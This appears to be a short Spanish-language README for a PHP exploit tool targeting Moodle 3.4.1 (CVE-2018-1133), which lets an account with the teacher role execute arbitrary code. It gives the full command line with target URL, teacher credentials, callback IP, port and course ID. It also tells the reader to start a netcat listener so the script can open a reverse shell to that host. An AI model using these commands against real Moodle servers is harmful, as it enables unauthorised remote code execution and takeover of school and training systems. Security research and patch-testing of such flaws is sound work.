
Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133
Un usuario con el rol de profesor puede ejecutar código arbitrario.
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
user The account username
pass The password to the account
ip Callback IP
port Callback Port
course Valid course ID belonging to the teacher
Asegúrate de estar ejecutando un listener netcat en el puerto especificado antes de ejecutar este script.
nc -lnvp 1010
Esto intentará abrir una shell inversa a la IP y puerto de escucha.
Este exploit se basa en información proporcionada por Robin Peraglie.
Lectura adicional: https://blog.ripstech.com/2018/moodle-remote-code-execution